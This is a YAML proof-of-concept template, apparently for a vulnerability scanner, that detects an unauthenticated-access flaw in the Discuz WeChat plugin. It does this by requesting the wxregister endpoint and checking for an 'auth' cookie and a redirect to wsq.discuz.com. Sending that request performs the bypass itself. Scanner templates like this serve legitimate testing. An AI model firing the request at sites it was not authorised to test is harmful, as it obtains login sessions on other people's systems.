name: poc-yaml-discuz-wechat-plugins-unauth
manual: true
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /plugin.php?id=wechat:wechat&ac=wxregister
            follow_redirects: false
        expression: response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com")
expression: r0()
detail:
    author: JrD
    links:
        - https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI
